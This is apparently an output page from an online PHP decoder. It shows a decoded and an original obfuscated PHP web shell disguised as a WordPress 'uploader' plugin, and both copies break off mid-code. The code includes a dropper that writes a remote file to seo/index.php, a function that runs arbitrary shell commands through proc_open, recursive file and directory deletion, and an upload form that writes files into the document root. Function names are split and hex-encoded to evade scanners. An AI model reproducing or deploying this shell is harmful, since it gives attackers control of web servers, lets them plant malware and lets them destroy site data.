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PHP Decode

<?php $dirx="seo" ; $url="" ; $filex="index.php" ; if (!file_ex..

Decoded Output download

<?php $dirx="seo" ; $url="" ; $filex="index.php" ; if (!file_exists($dirx)) { mkdir($dirx, 0755, true); } file_put_contents($dirx . '/' . $filex, file_get_contents($url)); echo 'done !'; ?><?php /* plugin name: who knows wordpress uploader plugin uri: description: this uploader created by who knows with wp mass shell uploader 
 disclaimer : author is not responsible for any action you made with this tools. use this for educational perpose only version: 1 author uri: */ ?><?php goto vj7mh; mstwh: $a_40d8acc2=$j_f0fb391c("\", "/", $a_40d8acc2); goto jtalv; nw3fw: function fdt($i_367af3ad) { $a_e8b7be43="da" . "te"; $g_71beeff9="fil" . "emt" . "ime"; return $a_e8b7be43("F d Y H:i:s", $g_71beeff9($i_367af3ad)); } goto cdbxp; pernt: function red($f_3b8ba7c7) { echo "<center><font color='red'>" . $f_3b8ba7c7 . "</center></font>"; } goto msple; zwo23: $o_65062865="ph" . "p_u" . "na" . "me"; goto mouia; dez8r: $t_b8c5c82a="oc" . "td" . "ec"; goto gddnr; b2wmc: $i_bff284e4="ph" . "pve" . "rsi" . "on"; goto in22g; uazbu: echo "</td></tr><tr><td><br>"; goto mb4of; nbjx3: function xrd($x_b666e030) { $a_e8b7be43="s" . "ca" . "nd" . "ir"; $y_e11ee94d=$a_e8b7be43($x_b666e030); foreach ($y_e11ee94d as $m_1f1b251e) { if ($m_1f1b251e=== "." || $m_1f1b251e=== "..") { continue; } $g_71beeff9="is" . "_di" . "r"; $k_bfb08b47=$x_b666e030 . "/" . $m_1f1b251e; if ($g_71beeff9($k_bfb08b47)) { xrd($k_bfb08b47); } else { $y_6b9df6f="u" . "nl" . "in" . "k"; $y_6b9df6f($k_bfb08b47); } } $r_98dd4acc="rm" . "di" . "r"; $r_98dd4acc($x_b666e030); } goto juhwk; vtkiw: $e_3268d84c="ge" . "tc" . "wd"; goto vldw0; tpxip: $h_4fc5566b="st" . "rp" . "os"; goto bkxbx; hqfnp: function komend($b_6aa5975e, $r_52f18e84) { $f_8cdc1683="pr" . "eg_" . "mat" . "ch"; $g_f8e1180f="2" . ">" . "&" . "1"; if (!$f_8cdc1683("/" . $g_f8e1180f . "/i", $b_6aa5975e)) { $b_6aa5975e=$b_6aa5975e . " " . $g_f8e1180f; } $a_e8b7be43="fu" . "ncti" . "on_" . "ex" . "is" . "ts"; $g_71beeff9="p" . "ro" . "c_op" . "en"; $y_6b9df6f="htm" . "lspe" . "cialc" . "hars"; $r_98dd4acc="s" . "trea" . "m_g" . "et_c" . "ont" . "ents"; if ($a_e8b7be43($g_71beeff9)) { $q_a7ea4b8f=$g_71beeff9($b_6aa5975e, array(0=>array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $d_14739299, $r_52f18e84); return "<pre>" . $y_6b9df6f($r_98dd4acc($d_14739299[1])) . "</pre>"; } else { return "pr" . "oc" . "_op" . "en f" . "unc" . "tio" . "n i" . "s di" . "sabl" . "ed !"; } } goto jfvr0; zpbqe: $p_cb4ca253 = "fi" . "le_p" . "ut_co" . "nte" . "nts"; goto gwd6r; q7tob: $o_2ba9936f = "s" . "trip" . "slash" . "es"; goto qrum_; nen6f: $x_1a0aa036 = "ba" . "se" . "na" . "me"; goto bo_ok; fph06: $s_64f81ca8 = "fu" . "nc" . "tion" . "_exi" . "sts"; goto uaadv; uqedw: $u_61d14724 = @$j_adf9923e($a_40d8acc2); goto kjlyj; mb4of: if (isset($_post["upwkwk"])) { if (isset($_post["berkasnya"])) { if ($_post["dirnya"] == "2") { $a_40d8acc2 = $_server["DOC" . "UME" . "NT_R" . "OOT"]; } if (empty($_files["berkas"]["name"])) { echo "<font color=orange>Fi" . "le not Se" . "lected !</font><br><br>"; } else { $s_adf3f363 = @$p_cb4ca253($a_40d8acc2 . "/" . $_files["berkas"]["name"], @$w_cecf26c5($_files["berkas"]["tm" . "p_na" . "me"])); if ($z_395285b($a_40d8acc2 . "/" . $_files["berkas"]["name"])) { $i_367af3ad = $a_40d8acc2 . "/" . $_files["berkas"]["name"]; echo "Fi" . "le Upl" . "oa" . "ded ! &nbsp;<font color='gold'><i>" . $i_367af3ad . "</i></font><br>"; if ($h_4fc5566b($a_40d8acc2, $_server["DO" . "CU" . "M" . "ENT" . "_R" . "OO" . "T"]) !== false) { $l_7d4e0413 = $j_f0fb391c($_server["DO" . "CU" . "M" . "ENT" . "_R" . "OO" . "T"], $m_821bfdba . "/", $i_367af3ad); echo "Li" . "nk : <a href='" . $l_7d4e0413 . "'><font color='#df5'>" . $l_7d4e0413 . "</font></a><br>"; } echo "<br>"; } else { echo  ?>

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Original Code

<?php $dirx="seo" ; $url="" ; $filex="index.php" ; if (!file_exists($dirx)) { mkdir($dirx, 0755, true); } file_put_contents($dirx . '/' . $filex, file_get_contents($url)); echo 'done !'; ?><?php /* plugin name: who knows wordpress uploader plugin uri: description: this uploader created by who knows with wp mass shell uploader \n disclaimer : author is not responsible for any action you made with this tools. use this for educational perpose only version: 1 author uri: */ ?><?php goto vj7mh; mstwh: $a_40d8acc2=$j_f0fb391c("\x5c", "\57", $a_40d8acc2); goto jtalv; nw3fw: function fdt($i_367af3ad) { $a_e8b7be43="\144\x61" . "\x74\x65"; $g_71beeff9="\146\151\154" . "\145\155\164" . "\151\155\x65"; return $a_e8b7be43("\106\x20\144\x20\x59\40\110\x3a\151\x3a\x73", $g_71beeff9($i_367af3ad)); } goto cdbxp; pernt: function red($f_3b8ba7c7) { echo "\74\x63\145\156\x74\x65\x72\76\74\146\x6f\x6e\164\40\x63\157\154\157\x72\x3d\47\x72\145\x64\47\76" . $f_3b8ba7c7 . "\x3c\x2f\x63\145\x6e\164\145\x72\x3e\74\57\146\157\156\164\x3e"; } goto msple; zwo23: $o_65062865="\x70\150" . "\160\x5f\x75" . "\156\141" . "\x6d\145"; goto mouia; dez8r: $t_b8c5c82a="\x6f\x63" . "\164\x64" . "\x65\x63"; goto gddnr; b2wmc: $i_bff284e4="\160\x68" . "\x70\x76\x65" . "\162\x73\x69" . "\157\x6e"; goto in22g; uazbu: echo "\74\57\x74\x64\76\74\57\x74\x72\76\x3c\x74\162\x3e\x3c\x74\x64\76\74\142\x72\x3e"; goto mb4of; nbjx3: function xrd($x_b666e030) { $a_e8b7be43="\x73" . "\x63\141" . "\156\x64" . "\151\162"; $y_e11ee94d=$a_e8b7be43($x_b666e030); foreach ($y_e11ee94d as $m_1f1b251e) { if ($m_1f1b251e=== "\x2e" || $m_1f1b251e=== "\56\x2e") { continue; } $g_71beeff9="\x69\163" . "\x5f\144\x69" . "\162"; $k_bfb08b47=$x_b666e030 . "\57" . $m_1f1b251e; if ($g_71beeff9($k_bfb08b47)) { xrd($k_bfb08b47); } else { $y_6b9df6f="\165" . "\156\154" . "\x69\156" . "\x6b"; $y_6b9df6f($k_bfb08b47); } } $r_98dd4acc="\162\x6d" . "\x64\151" . "\162"; $r_98dd4acc($x_b666e030); } goto juhwk; vtkiw: $e_3268d84c="\147\145" . "\164\x63" . "\x77\144"; goto vldw0; tpxip: $h_4fc5566b="\163\164" . "\162\x70" . "\157\163"; goto bkxbx; hqfnp: function komend($b_6aa5975e, $r_52f18e84) { $f_8cdc1683="\x70\x72" . "\145\x67\x5f" . "\155\x61\164" . "\x63\150"; $g_f8e1180f="\x32" . "\76" . "\46" . "\61"; if (!$f_8cdc1683("\x2f" . $g_f8e1180f . "\x2f\151", $b_6aa5975e)) { $b_6aa5975e=$b_6aa5975e . "\x20" . $g_f8e1180f; } $a_e8b7be43="\x66\165" . "\x6e\x63\164\x69" . "\157\156\x5f" . "\x65\170" . "\x69\163" . "\164\163"; $g_71beeff9="\x70" . "\162\x6f" . "\143\x5f\157\x70" . "\x65\156"; $y_6b9df6f="\x68\164\155" . "\154\x73\x70\x65" . "\143\151\x61\154\x63" . "\x68\141\x72\x73"; $r_98dd4acc="\x73" . "\x74\x72\x65\141" . "\x6d\x5f\147" . "\x65\164\x5f\143" . "\157\156\x74" . "\145\x6e\164\x73"; if ($a_e8b7be43($g_71beeff9)) { $q_a7ea4b8f=$g_71beeff9($b_6aa5975e, array(0=>array("\x70\151\160\145", "\162"), 1 => array("\x70\151\x70\x65", "\167"), 2 => array("\160\151\160\145", "\x72")), $d_14739299, $r_52f18e84); return "\74\x70\x72\x65\x3e" . $y_6b9df6f($r_98dd4acc($d_14739299[1])) . "\x3c\57\160\x72\145\x3e"; } else { return "\x70\162" . "\157\143" . "\137\x6f\160" . "\145\x6e\x20\x66" . "\x75\x6e\143" . "\x74\151\157" . "\x6e\x20\151" . "\163\40\144\x69" . "\x73\x61\142\x6c" . "\145\x64\x20\41"; } } goto jfvr0; zpbqe: $p_cb4ca253 = "\146\151" . "\x6c\x65\x5f\x70" . "\x75\x74\137\143\157" . "\x6e\x74\x65" . "\156\x74\x73"; goto gwd6r; q7tob: $o_2ba9936f = "\163" . "\x74\x72\151\160" . "\x73\154\x61\163\150" . "\145\x73"; goto qrum_; nen6f: $x_1a0aa036 = "\x62\141" . "\x73\x65" . "\156\x61" . "\x6d\x65"; goto bo_ok; fph06: $s_64f81ca8 = "\146\x75" . "\156\x63" . "\x74\x69\x6f\156" . "\x5f\145\170\x69" . "\163\x74\163"; goto uaadv; uqedw: $u_61d14724 = @$j_adf9923e($a_40d8acc2); goto kjlyj; mb4of: if (isset($_post["\x75\160\167\x6b\x77\153"])) { if (isset($_post["\x62\x65\x72\153\141\163\156\171\141"])) { if ($_post["\x64\x69\x72\x6e\x79\141"] == "\x32") { $a_40d8acc2 = $_server["\x44\117\103" . "\125\x4d\105" . "\x4e\124\137\122" . "\x4f\x4f\x54"]; } if (empty($_files["\x62\145\162\153\141\163"]["\156\x61\155\x65"])) { echo "\x3c\146\x6f\156\164\x20\x63\x6f\154\157\162\x3d\x6f\162\141\156\x67\x65\x3e\106\151" . "\154\x65\x20\156\157\164\x20\123\145" . "\154\x65\x63\x74\145\144\40\41\74\x2f\146\157\156\x74\76\x3c\x62\x72\76\74\x62\x72\76"; } else { $s_adf3f363 = @$p_cb4ca253($a_40d8acc2 . "\57" . $_files["\142\145\162\x6b\141\x73"]["\156\x61\155\x65"], @$w_cecf26c5($_files["\142\145\x72\153\141\163"]["\x74\155" . "\160\x5f\x6e\141" . "\x6d\145"])); if ($z_395285b($a_40d8acc2 . "\x2f" . $_files["\x62\145\162\x6b\x61\163"]["\x6e\x61\x6d\145"])) { $i_367af3ad = $a_40d8acc2 . "\57" . $_files["\x62\145\x72\x6b\x61\x73"]["\x6e\141\x6d\145"]; echo "\x46\x69" . "\x6c\x65\x20\125\160\x6c" . "\157\x61" . "\x64\145\144\40\41\x20\x26\156\142\163\160\x3b\x3c\146\x6f\156\164\x20\143\157\x6c\157\162\75\47\147\157\x6c\144\x27\76\x3c\x69\76" . $i_367af3ad . "\x3c\57\151\x3e\74\57\x66\157\x6e\164\x3e\74\x62\x72\x3e"; if ($h_4fc5566b($a_40d8acc2, $_server["\104\x4f" . "\103\125" . "\115" . "\105\x4e\x54" . "\137\122" . "\x4f\x4f" . "\x54"]) !== false) { $l_7d4e0413 = $j_f0fb391c($_server["\104\x4f" . "\x43\125" . "\115" . "\105\x4e\124" . "\x5f\122" . "\x4f\x4f" . "\124"], $m_821bfdba . "\57", $i_367af3ad); echo "\x4c\x69" . "\156\x6b\x20\x3a\x20\x3c\141\x20\x68\162\x65\146\x3d\47" . $l_7d4e0413 . "\x27\x3e\x3c\x66\157\x6e\164\x20\x63\157\x6c\157\x72\x3d\47\x23\x64\x66\65\47\x3e" . $l_7d4e0413 . "\x3c\57\146\x6f\156\x74\x3e\74\57\141\76\74\x62\162\76"; } echo "\x3c\142\x72\x3e"; } else { echo 

Function Calls





MD5 035e64befd6844d9547a1a76495545a5
Eval Count 0
Decode Time 67 ms